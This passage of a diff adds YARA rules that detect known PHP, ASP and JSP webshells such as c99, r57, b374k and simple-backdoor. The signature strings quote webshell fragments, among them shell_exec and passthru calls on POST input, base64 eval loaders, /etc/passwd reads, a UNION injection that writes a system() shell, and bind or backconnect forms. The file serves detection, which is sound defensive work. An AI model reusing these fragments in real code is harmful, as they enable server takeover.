+ hash0 = "fdbf54d5bf3264eb1c4bff1fac548879"
+ hash1 = "4a44d82da21438e32d4f514ab35c26b6"
+ hash2 = "0c5d227f4aa76785e4760cdcff78a661"
+ strings:
+ $s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
+ $s1 = "$dires = $dires . $directory;" fullword
+ $s4 = "$arr = array_merge($arr, glob(\"*\"));" fullword
+ condition:
+ 2 of them
+}
+rule _nst_php_php_cybershell_php_php_img_php_php_nstview_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files nst.php.php.txt, cybershell.php.php.txt, img.php.php.txt, nstview.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
+ hash1 = "ef8828e0bc0641a655de3932199c0527"
+ hash2 = "17a07bb84e137b8aa60f87cd6bfab748"
+ hash3 = "4745d510fed4378e4b1730f56f25e569"
+ strings:
+ $s0 = "@$rto=$_POST['rto'];" fullword
+ $s2 = "SCROLLBAR-TRACK-COLOR: #91AAFF" fullword
+ $s3 = "$to1=str_replace(\"//\",\"/\",$to1);" fullword
+ condition:
+ 2 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_dC3_Security_Crew_Shell_PRiV_php_SpecialShell_99_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, dC3 Security Crew Shell PRiV.php.txt, SpecialShell_99.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+ hash1 = "3ca5886cd54d495dc95793579611f59a"
+ hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+ hash3 = "433706fdc539238803fd47c4394b5109"
+ hash4 = "09609851caa129e40b0d56e90dfc476c"
+ strings:
+ $s0 = " if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\":"
+ $s1 = " $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";" fullword
+ condition:
+ all of them
+}
+rule _c99shell_v1_0_php_php_c99php_1_c2007_php_php_c100_php {
+ meta:
+ description = "Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, 1.txt, c2007.php.php.txt, c100.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
+ hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+ hash2 = "44542e5c3e9790815c49d5f9beffbbf2"
+ hash3 = "d089e7168373a0634e1ac18c0ee00085"
+ hash4 = "38fd7e45f9c11a37463c3ded1c76af4c"
+ strings:
+ $s0 = "$result = mysql_query(\"SHOW PROCESSLIST\", $sql_sock); " fullword
+ condition:
+ all of them
+}
+rule multiple_php_webshells_2 {
+ meta:
+ description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+ hash1 = "3ca5886cd54d495dc95793579611f59a"
+ hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+ hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+ hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+ hash5 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+ hash6 = "09609851caa129e40b0d56e90dfc476c"
+ hash7 = "671cad517edd254352fe7e0c7c981c39"
+ strings:
+ $s0 = "elseif (!empty($ft)) {echo \"<center><b>Manually selected type is incorrect. I"
+ $s1 = "else {echo \"<center><b>Unknown extension (\".$ext.\"), please, select type ma"
+ $s3 = "$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";" fullword
+ condition:
+ all of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_1_SpecialShell_99_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+ hash1 = "3ca5886cd54d495dc95793579611f59a"
+ hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+ hash3 = "44542e5c3e9790815c49d5f9beffbbf2"
+ hash4 = "09609851caa129e40b0d56e90dfc476c"
+ strings:
+ $s0 = "if ($total === FALSE) {$total = 0;}" fullword
+ $s1 = "$free_percent = round(100/($total/$free),2);" fullword
+ $s2 = "if (!$bool) {$bool = is_dir($letter.\":\\\\\");}" fullword
+ $s3 = "$bool = $isdiskette = in_array($letter,$safemode_diskettes);" fullword
+ condition:
+ 2 of them
+}
+rule _r577_php_php_r57_php_php_spy_php_php_s_php_php {
+ meta:
+ description = "Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+ hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+ hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
+ hash3 = "817671e1bdc85e04cc3440bbd9288800"
+ strings:
+ $s0 = "$res = mssql_query(\"select * from r57_temp_table\",$db);" fullword
+ $s2 = "'eng_text30'=>'Cat file'," fullword
+ $s3 = "@mssql_query(\"drop table r57_temp_table\",$db);" fullword
+ condition:
+ 1 of them
+}
+rule _nixrem_php_php_c99shell_v1_0_php_php_c99php_NIX_REMOTE_WEB_SHELL_v_0_5_alpha_Lite_Public_Version_php {
+ meta:
+ description = "Semi-Auto-generated - from files nixrem.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ super_rule = 1
+ hash0 = "40a3e86a63d3d7f063a86aab5b5f92c6"
+ hash1 = "d8ae5819a0a2349ec552cbcf3a62c975"
+ hash2 = "9e9ae0332ada9c3797d6cee92c2ede62"
+ hash3 = "f3ca29b7999643507081caab926e2e74"
+ strings:
+ $s0 = "$num = $nixpasswd + $nixpwdperpage;" fullword
+ $s1 = "$ret = posix_kill($pid,$sig);" fullword
+ $s2 = "if ($uid) {echo join(\":\",$uid).\"<br>\";}" fullword
+ $s3 = "$i = $nixpasswd;" fullword
+ condition:
+ 2 of them
+}
+
+/* GIF Header webshell */
+
+rule DarkSecurityTeam_Webshell {
+ meta:
+ description = "Dark Security Team Webshell"
+ author = "Florian Roth"
+ hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24"
+ score = 50
+ strings:
+ $s0 = "form method=post><input type=hidden name=\"\"#\"\" value=Execute(Session(\"\"#\"\"))><input name=thePath value=\"\"\"&HtmlEncode(Server.MapPath(\".\"))&" ascii
+ condition:
+ 1 of them
+}
+
+rule GIFCloaked_Webshell {
+ meta:
+ description = "Looks like a webshell cloaked as GIF"
+ author = "Florian Roth"
+ hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24"
+ score = 50
+ strings:
+ $magic = { 47 49 46 38 } /* GIF8 ... */
+ $s0 = "input type"
+ $s1 = "<%eval request"
+ $s2 = "<%eval(Request.Item["
+ $s3 = "LANGUAGE='VBScript'"
+ condition:
+ ( $magic at 0 ) and ( 1 of ($s*) )
+}
+
+rule PHP_Cloaked_Webshell_SuperFetchExec {
+ meta:
+ description = "Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC"
+ reference = "http://goo.gl/xFvioC"
+ author = "Florian Roth"
+ score = 50
+ strings:
+ $s0 = "else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);"
+ condition:
+ $s0
+}
+
+/* PHP Webshell Update - August 2014 - deducted from https://github.com/JohnTroony/php-webshells */
+
+rule WebShell_RemExp_asp_php {
+ meta:
+ description = "PHP Webshells Github Archive - file RemExp.asp.php.txt"
+ author = "Florian Roth"
+ hash = "d9919dcf94a70d5180650de8b81669fa1c10c5a2"
+ strings:
+ $s0 = "lsExt = Right(FileName, Len(FileName) - liCount)" fullword
+ $s7 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
+ $s13 = "Response.Write Drive.ShareName & \" [share]\"" fullword
+ $s19 = "If Request.QueryString(\"CopyFile\") <> \"\" Then" fullword
+ $s20 = "<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> Name</td>" fullword
+ condition:
+ all of them
+}
+rule WebShell_dC3_Security_Crew_Shell_PRiV {
+ meta:
+ description = "PHP Webshells Github Archive - file dC3_Security_Crew_Shell_PRiV.php"
+ author = "Florian Roth"
+ hash = "1b2a4a7174ca170b4e3a8cdf4814c92695134c8a"
+ strings:
+ $s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
+ $s4 = "$ps=str_replace(\"\\\\\",\"/\",getenv('DOCUMENT_ROOT'));" fullword
+ $s5 = "header(\"Expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));" fullword
+ $s15 = "search_file($_POST['search'],urldecode($_POST['dir']));" fullword
+ $s16 = "echo base64_decode($images[$_GET['pic']]);" fullword
+ $s20 = "if (isset($_GET['rename_all'])) {" fullword
+ condition:
+ 3 of them
+}
+rule WebShell_simattacker {
+ meta:
+ description = "PHP Webshells Github Archive - file simattacker.php"
+ author = "Florian Roth"
+ hash = "258297b62aeaf4650ce04642ad5f19be25ec29c9"
+ strings:
+ $s1 = "$from = rand (71,1020000000).\"@\".\"Attacker.com\";" fullword
+ $s4 = " Turkish Hackers : WWW.ALTURKS.COM <br>" fullword
+ $s5 = " Programer : SimAttacker - Edited By KingDefacer<br>" fullword
+ $s6 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
+ $s10 = " e-mail : kingdefacer@msn.com<br>" fullword
+ $s17 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
+ $s18 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
+ $s20 = "$Comments=$_POST['Comments'];" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_DTool_Pro {
+ meta:
+ description = "PHP Webshells Github Archive - file DTool Pro.php"
+ author = "Florian Roth"
+ hash = "e2ee1c7ba7b05994f65710b7bbf935954f2c3353"
+ strings:
+ $s1 = "function PHPget(){inclVar(); if(confirm(\"O PHPget agora oferece uma lista pront"
+ $s2 = "<font size=3>by r3v3ng4ns - revengans@gmail.com </font>" fullword
+ $s3 = "function PHPwriter(){inclVar();var url=prompt(\"[ PHPwriter ] by r3v3ng4ns\\nDig"
+ $s11 = "//Turns the 'ls' command more usefull, showing it as it looks in the shell" fullword
+ $s13 = "if (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";" fullword
+ $s14 = "//To keep the changes in the url, when using the 'GET' way to send php variables" fullword
+ $s16 = "function PHPf(){inclVar();var o=prompt(\"[ PHPfilEditor ] by r3v3ng4ns\\nDigite "
+ $s18 = "if(empty($fu)) $fu = @$_GET['fu'];" fullword
+ condition:
+ 3 of them
+}
+rule WebShell_ironshell {
+ meta:
+ description = "PHP Webshells Github Archive - file ironshell.php"
+ author = "Florian Roth"
+ hash = "d47b8ba98ea8061404defc6b3a30839c4444a262"
+ strings:
+ $s0 = "<title>'.getenv(\"HTTP_HOST\").' ~ Shell I</title>" fullword
+ $s2 = "$link = mysql_connect($_POST['host'], $_POST['username'], $_POST"
+ $s4 = "error_reporting(0); //If there is an error, we'll show it, k?" fullword
+ $s8 = "print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&d"
+ $s15 = "if(!is_numeric($_POST['timelimit']))" fullword
+ $s16 = "if($_POST['chars'] == \"9999\")" fullword
+ $s17 = "<option value=\\\"az\\\">a - zzzzz</option>" fullword
+ $s18 = "print shell_exec($command);" fullword
+ condition:
+ 3 of them
+}
+rule WebShell_indexer_asp_php {
+ meta:
+ description = "PHP Webshells Github Archive - file indexer.asp.php.txt"
+ author = "Florian Roth"
+ hash = "e9a7aa5eb1fb228117dc85298c7d3ecd8e288a2d"
+ strings:
+ $s0 = "<meta http-equiv=\"Content-Language\" content=\"tr\">" fullword
+ $s1 = "<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>" fullword
+ $s2 = "<form action=\"?Gonder\" method=\"post\">" fullword
+ $s4 = "<form action=\"?oku\" method=\"post\">" fullword
+ $s7 = "var message=\"SaNaLTeRoR - " fullword
+ $s8 = "nDexEr - Reader\"" fullword
+ condition:
+ 3 of them
+}
+rule WebShell_toolaspshell {
+ meta:
+ description = "PHP Webshells Github Archive - file toolaspshell.php"
+ author = "Florian Roth"
+ hash = "11d236b0d1c2da30828ffd2f393dd4c6a1022e3f"
+ strings:
+ $s0 = "cprthtml = \"<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDef"
+ $s12 = "barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),\"\\\")) - 1" fullword
+ $s20 = "destino3 = folderItem.path & \"\\index.asp\"" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_b374k_mini_shell_php_php {
+ meta:
+ description = "PHP Webshells Github Archive - file b374k-mini-shell-php.php.php"
+ author = "Florian Roth"
+ hash = "afb88635fbdd9ebe86b650cc220d3012a8c35143"
+ strings:
+ $s0 = "@error_reporting(0);" fullword
+ $s2 = "@eval(gzinflate(base64_decode($code)));" fullword
+ $s3 = "@set_time_limit(0); " fullword
+ condition:
+ all of them
+}
+rule WebShell_Sincap_1_0 {
+ meta:
+ description = "PHP Webshells Github Archive - file Sincap 1.0.php"
+ author = "Florian Roth"
+ hash = "9b72635ff1410fa40c4e15513ae3a496d54f971c"
+ strings:
+ $s4 = "</font></span><a href=\"mailto:shopen@aventgrup.net\">" fullword
+ $s5 = "<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) B" fullword
+ $s9 = "</span>Avrasya Veri ve NetWork Teknolojileri Geli" fullword
+ $s12 = "while (($ekinci=readdir ($sedat))){" fullword
+ $s19 = "$deger2= \"$ich[$tampon4]\";" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_b374k_php {
+ meta:
+ description = "PHP Webshells Github Archive - file b374k.php.php"
+ author = "Florian Roth"
+ hash = "04c99efd187cf29dc4e5603c51be44170987bce2"
+ strings:
+ $s0 = "// encrypt your password to md5 here http://kerinci.net/?x=decode" fullword
+ $s6 = "// password (default is: b374k)"
+ $s8 = "//******************************************************************************"
+ $s9 = "// b374k 2.2" fullword
+ $s10 = "eval(\"?>\".gzinflate(base64_decode("
+ condition:
+ 3 of them
+}
+rule WebShell_SimAttacker___Vrsion_1_0_0___priv8_4_My_friend {
+ meta:
+ description = "PHP Webshells Github Archive - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
+ author = "Florian Roth"
+ hash = "6454cc5ab73143d72cf0025a81bd1fe710351b44"
+ strings:
+ $s4 = " Iranian Hackers : WWW.SIMORGH-EV.COM <br>" fullword
+ $s5 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
+ $s10 = "<a style=\"TEXT-DECORATION: none\" href=\"http://www.simorgh-ev.com\">" fullword
+ $s16 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
+ $s17 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
+ $s19 = "$Comments=$_POST['Comments'];" fullword
+ $s20 = "Victim Mail :<br><input type='text' name='to' ><br>" fullword
+ condition:
+ 3 of them
+}
+rule WebShell_h4ntu_shell__powered_by_tsoi_ {
+ meta:
+ description = "PHP Webshells Github Archive - file h4ntu shell [powered by tsoi].php"
+ author = "Florian Roth"
+ hash = "cbca8cd000e705357e2a7e0cf8262678706f18f9"
+ strings:
+ $s11 = "<title>h4ntu shell [powered by tsoi]</title>" fullword
+ $s13 = "$cmd = $_POST['cmd'];" fullword
+ $s16 = "$uname = posix_uname( );" fullword
+ $s17 = "if(!$whoami)$whoami=exec(\"whoami\");" fullword
+ $s18 = "echo \"<p><font size=2 face=Verdana><b>This Is The Server Information</b></font>"
+ $s20 = "ob_end_clean();" fullword
+ condition:
+ 3 of them
+}
+rule WebShell_php_webshells_MyShell {
+ meta:
+ description = "PHP Webshells Github Archive - file MyShell.php"
+ author = "Florian Roth"
+ hash = "42e283c594c4d061f80a18f5ade0717d3fb2f76d"
+ strings:
+ $s3 = "<title>MyShell error - Access Denied</title>" fullword
+ $s4 = "$adminEmail = \"youremail@yourserver.com\";" fullword
+ $s5 = "//A workdir has been asked for - we chdir to that dir." fullword
+ $s6 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"
+ $s13 = "#$autoErrorTrap Enable automatic error traping if command returns error." fullword
+ $s14 = "/* No work_dir - we chdir to $DOCUMENT_ROOT */" fullword
+ $s19 = "#every command you excecute." fullword
+ $s20 = "<form name=\"shell\" method=\"post\">" fullword
+ condition:
+ 3 of them
+}
+rule WebShell_php_webshells_pws {
+ meta:
+ description = "PHP Webshells Github Archive - file pws.php"
+ author = "Florian Roth"
+ hash = "7a405f1c179a84ff8ac09a42177a2bcd8a1a481b"
+ strings:
+ $s6 = "if ($_POST['cmd']){" fullword
+ $s7 = "$cmd = $_POST['cmd'];" fullword
+ $s10 = "echo \"FILE UPLOADED TO $dez\";" fullword
+ $s11 = "if (file_exists($uploaded)) {" fullword
+ $s12 = "copy($uploaded, $dez);" fullword
+ $s17 = "passthru($cmd);" fullword
+ condition:
+ 4 of them
+}
+rule WebShell_reader_asp_php {
+ meta:
+ description = "PHP Webshells Github Archive - file reader.asp.php.txt"
+ author = "Florian Roth"
+ hash = "70656f3495e2b3ad391a77d5208eec0fb9e2d931"
+ strings:
+ $s5 = "ster\" name=submit> </Font> <a href=mailto:mailbomb@hotmail"
+ $s12 = " HACKING " fullword
+ $s16 = "FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: "
+ $s20 = "PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKG"
+ condition:
+ 3 of them
+}
+rule WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 {
+ meta:
+ description = "PHP Webshells Github Archive - file Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php"
+ author = "Florian Roth"
+ hash = "db076b7c80d2a5279cab2578aa19cb18aea92832"
+ strings:
+ $s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
+ $s6 = "by PHP Emperor<xb5@hotmail.com>" fullword
+ $s9 = "\".htmlspecialchars($file).\" has been already loaded. PHP Emperor <xb5@hotmail."
+ $s11 = "die(\"<FONT COLOR=\\\"RED\\\"><CENTER>Sorry... File" fullword
+ $s15 = "if(empty($_GET['file'])){" fullword
+ $s16 = "echo \"<head><title>Safe Mode Shell</title></head>\"; " fullword
+ condition:
+ 3 of them
+}
+rule WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit {
+ meta:
+ description = "PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
+ author = "Florian Roth"
+ hash = "b2b797707e09c12ff5e632af84b394ad41a46fa4"
+ strings:
+ $s4 = "$liz0zim=shell_exec($_POST[liz0]); " fullword
+ $s6 = "$liz0=shell_exec($_POST[baba]); " fullword
+ $s9 = "echo \"<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass E"
+ $s12 = " :=) :</font><select size=\"1\" name=\"liz0\">" fullword
+ $s13 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
+ condition:
+ 1 of them
+}
+rule WebShell_php_backdoor {
+ meta:
+ description = "PHP Webshells Github Archive - file php-backdoor.php"
+ author = "Florian Roth"
+ hash = "b190c03af4f3fb52adc20eb0f5d4d151020c74fe"
+ strings:
+ $s5 = "http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix" fullword
+ $s6 = "// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombi"
+ $s11 = "if(!isset($_REQUEST['dir'])) die('hey,specify directory!');" fullword
+ $s13 = "else echo \"<a href='$PHP_SELF?f=$d/$dir'><font color=black>\";" fullword
+ $s15 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
+ condition:
+ 1 of them
+}
+rule WebShell_Worse_Linux_Shell {
+ meta:
+ description = "PHP Webshells Github Archive - file Worse Linux Shell.php"
+ author = "Florian Roth"
+ hash = "64623ab1246bc8f7d256b25f244eb2b41f543e96"
+ strings:
+ $s4 = "if( $_POST['_act'] == \"Upload!\" ) {" fullword
+ $s5 = "print \"<center><h1>#worst @dal.net</h1></center>\";" fullword
+ $s7 = "print \"<center><h1>Linux Shells</h1></center>\";" fullword
+ $s8 = "$currentCMD = \"ls -la\";" fullword
+ $s14 = "print \"<tr><td><b>System type:</b></td><td>$UName</td></tr>\";" fullword
+ $s19 = "$currentCMD = str_replace(\"\\\\\\\\\",\"\\\\\",$_POST['_cmd']);" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_php_webshells_pHpINJ {
+ meta:
+ description = "PHP Webshells Github Archive - file pHpINJ.php"
+ author = "Florian Roth"
+ hash = "75116bee1ab122861b155cc1ce45a112c28b9596"
+ strings:
+ $s3 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';" fullword
+ $s10 = "<form action = \"<?php echo \"$_SERVER[PHP_SELF]\" ; ?>\" method = \"post\">" fullword
+ $s11 = "$sql = \"0' UNION SELECT '0' , '<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 IN"
+ $s13 = "Full server path to a writable file which will contain the Php Shell <br />" fullword
+ $s14 = "$expurl= $url.\"?id=\".$sql ;" fullword
+ $s15 = "<header>|| .::News PHP Shell Injection::. ||</header> <br /> <br />" fullword
+ $s16 = "<input type = \"submit\" value = \"Create Exploit\"> <br /> <br />" fullword
+ condition:
+ 1 of them
+}
+rule WebShell_php_webshells_NGH {
+ meta:
+ description = "PHP Webshells Github Archive - file NGH.php"
+ author = "Florian Roth"
+ hash = "c05b5deecfc6de972aa4652cb66da89cfb3e1645"
+ strings:
+ $s0 = "<title>Webcommander at <?=$_SERVER[\"HTTP_HOST\"]?></title>" fullword
+ $s2 = "/* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */" fullword
+ $s5 = "<form action=<?=$script?>?act=bindshell method=POST>" fullword
+ $s9 = "<form action=<?=$script?>?act=backconnect method=POST>" fullword
+ $s11 = "<form action=<?=$script?>?act=mkdir method=POST>" fullword
+ $s16 = "die(\"<font color=#DF0000>Login error</font>\");" fullword
+ $s20 = "<b>Bind /bin/bash at port: </b><input type=text name=port size=8>" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_php_webshells_matamu {
+ meta:
+ description = "PHP Webshells Github Archive - file matamu.php"
+ author = "Florian Roth"
+ hash = "d477aae6bd2f288b578dbf05c1c46b3aaa474733"
+ strings:
+ $s2 = "$command .= ' -F';" fullword
+ $s3 = "/* We try and match a cd command. */" fullword
+ $s4 = "directory... Trust me - it works :-) */" fullword
+ $s5 = "$command .= \" 1> $tmpfile 2>&1; \" ." fullword
+ $s10 = "$new_dir = $regs[1]; // 'cd /something/...'" fullword
+ $s16 = "/* The last / in work_dir were the first charecter." fullword
+ condition:
+ 2 of them
+}
+rule WebShell_ru24_post_sh {
+ meta:
+ description = "PHP Webshells Github Archive - file ru24_post_sh.php"
+ author = "Florian Roth"
+ hash = "d2c18766a1cd4dda928c12ff7b519578ccec0769"
+ strings:
+ $s1 = "http://www.ru24-team.net" fullword
+ $s4 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
+ $s6 = "Ru24PostWebShell"
+ $s7 = "Writed by DreAmeRz" fullword
+ $s9 = "$function=passthru; // system, exec, cmd" fullword
+ condition:
+ 1 of them
+}
+rule WebShell_hiddens_shell_v1 {
+ meta:
+ description = "PHP Webshells Github Archive - file hiddens shell v1.php"
+ author = "Florian Roth"
+ hash = "1674bd40eb98b48427c547bf9143aa7fbe2f4a59"
+ strings:
+ $s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"
+ condition:
+ all of them
+}
+rule WebShell_c99_madnet {
+ meta:
+ description = "PHP Webshells Github Archive - file c99_madnet.php"
+ author = "Florian Roth"
+ hash = "17613df393d0a99fd5bea18b2d4707f566cff219"
+ strings:
+ $s0 = "$md5_pass = \"\"; //If no pass then hash" fullword
+ $s1 = "eval(gzinflate(base64_decode('"
+ $s2 = "$pass = \"pass\"; //Pass" fullword
+ $s3 = "$login = \"user\"; //Login" fullword
+ $s4 = " //Authentication" fullword
+ condition:
+ all of them
+}
+rule WebShell_c99_locus7s {
+ meta:
+ description = "PHP Webshells Github Archive - file c99_locus7s.php"
+ author = "Florian Roth"
+ hash = "d413d4700daed07561c9f95e1468fb80238fbf3c"
+ strings:
+ $s8 = "$encoded = base64_encode(file_get_contents($d.$f)); " fullword
+ $s9 = "$file = $tmpdir.\"dump_\".getenv(\"SERVER_NAME\").\"_\".$db.\"_\".date(\"d-m-Y"
+ $s10 = "else {$tmp = htmlspecialchars(\"./dump_\".getenv(\"SERVER_NAME\").\"_\".$sq"
+ $s11 = "$c99sh_sourcesurl = \"http://locus7s.com/\"; //Sources-server " fullword
+ $s19 = "$nixpwdperpage = 100; // Get first N lines from /etc/passwd " fullword
+ condition:
+ 2 of them
+}
+rule WebShell_JspWebshell_1_2 {
+ meta:
+ description = "PHP Webshells Github Archive - file JspWebshell_1.2.php"
+ author = "Florian Roth"
+ hash = "0bed4a1966117dd872ac9e8dceceb54024a030fa"
+ strings:
+ $s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
+ $s1 = "String password=request.getParameter(\"password\");" fullword
+ $s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
+ $s7 = "String editfile=request.getParameter(\"editfile\");" fullword
+ $s8 = "//String tempfilename=request.getParameter(\"file\");" fullword
+ $s12 = "password = (String)session.getAttribute(\"password\");" fullword
+ condition:
+ 3 of them
+}
+rule WebShell_safe0ver {
+ meta:
+ description = "PHP Webshells Github Archive - file safe0ver.php"
+ author = "Florian Roth"
+ hash = "366639526d92bd38ff7218b8539ac0f154190eb8"
+ strings:
+ $s3 = "$scriptident = \"$scriptTitle By Evilc0der.com\";" fullword
+ $s4 = "while (file_exists(\"$lastdir/newfile$i.txt\"))" fullword
+ $s5 = "else { /* <!-- Then it must be a File... --> */" fullword
+ $s7 = "$contents .= htmlentities( $line ) ;" fullword
+ $s8 = "<br><p><br>Safe Mode ByPAss<p><form method=\"POST\">" fullword
+ $s14 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
+ $s20 = "/* <!-- End of Actions --> */" fullword
+ condition:
+ 3 of them
+}
+rule WebShell_Uploader {
+ meta:
+ description = "PHP Webshells Github Archive - file Uploader.php"
+ author = "Florian Roth"
+ hash = "e216c5863a23fde8a449c31660fd413d77cce0b7"
+ strings:
+ $s1 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
+ condition:
+ all of them
+}
+rule WebShell_php_webshells_kral {
+ meta:
+ description = "PHP Webshells Github Archive - file kral.php"
+ author = "Florian Roth"
+ hash = "4cd1d1a2fd448cecc605970e3a89f3c2e5c80dfc"
+ strings:
+ $s1 = "$adres=gethostbyname($ip);" fullword
+ $s3 = "curl_setopt($ch,CURLOPT_POSTFIELDS,\"domain=\".$site);" fullword
+ $s4 = "$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";" fullword
+ $s16 = "echo $son.' <br> <font color=\"green\">Access</font><br>';" fullword
+ $s17 = "<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">BLaSTER</a><br /"
+ $s20 = "<p><strong>Server listeleyici</strong><br />" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_cgitelnet {
+ meta:
+ description = "PHP Webshells Github Archive - file cgitelnet.php"
+ author = "Florian Roth"
+ hash = "72e5f0e4cd438e47b6454de297267770a36cbeb3"
+ strings:
+ $s9 = "# Author Homepage: http://www.rohitab.com/" fullword
+ $s10 = "elsif($Action eq \"command\") # user wants to run a command" fullword
+ $s18 = "# in a command line on Windows NT." fullword
+ $s20 = "print \"Transfered $TargetFileSize Bytes.<br>\";" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_simple_backdoor {
+ meta:
+ description = "PHP Webshells Github Archive - file simple-backdoor.php"
+ author = "Florian Roth"
+ hash = "edcd5157a68fa00723a506ca86d6cbb8884ef512"
+ strings:
+ $s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
+ $s1 = "<!-- http://michaeldaw.org 2006 -->" fullword
+ $s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
+ $s3 = " echo \"</pre>\";" fullword
+ $s4 = " $cmd = ($_REQUEST['cmd']);" fullword
